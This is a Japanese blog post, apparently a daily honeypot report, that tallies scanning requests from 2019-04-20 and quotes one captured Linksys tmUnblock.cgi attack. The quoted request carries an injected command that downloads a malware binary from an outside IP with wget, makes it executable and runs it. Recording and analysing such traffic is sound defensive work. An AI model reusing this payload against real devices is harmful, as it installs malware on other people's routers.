honeypotの簡易解析20日目 |

2019-04-20のアクセス数は71件でした。

■送信元IPアドレスの数は 56件です。

■メソッドの一覧と件数は以下です。

method	総数
GET	67
HEAD	3
POST	1
合計結果	71

■アクセスパス一覧と件数は以下です。

path	method	総数
/	GET	51
///?author=1	GET	1
///wp-json/wp/v2/users/	GET	1
/HNAP1/	GET	2
/manager/html	GET	1
/phpmy/scripts/setup.php	GET	1
/phpMyAdmin/scripts/setup.php	GET	2
/pma/scripts/setup.php	GET	1
/redirect.php	HEAD	1
/robots.txt	HEAD	1
/tmUnblock.cgi	POST	1
/w00tw00t.at.blackhats.romanian.anti-sec:)	GET	1
/wp-login.php	GET	1
http://110.249.212.46/testget?q=23333&port=80	GET	5
http://112.124.42.80:63435/	HEAD	1

気になるlog

-=-=22件目のlog=-=-

[2019-04-20 05:33:48+0900] 207.154.236.43 188.166.41.194:80 "POST /tmUnblock.cgi HTTP/1.1" 200 False
POST /tmUnblock.cgi HTTP/1.1
 Host: 188.166.41.194:80
 Connection: keep-alive
 Accept-Encoding: gzip, deflate
 Accept: /
 User-Agent: python-requests/2.20.0
 Content-Length: 227
 Content-Type: application/x-www-form-urlencoded
ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+mpsl%3B+wget+http%3A%2F%2F134.209.226.252%2Fvb%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1

よく来るlinksysの脆弱性ですが、最近翌日でも検体をgetできません。virustotalはこちら。

マルウェアの設置先を頻繁に変更していると思われます。

tmUnblock.cgiを検知したら、他のサーバに連携させて収集させたいな〜

2022年1月
月	火	水	木	金	土	日
					1	2
3	4	5	6	7	8	9
10	11	12	13	14	15	16
17	18	19	20	21	22	23
24	25	26	27	28	29	30
31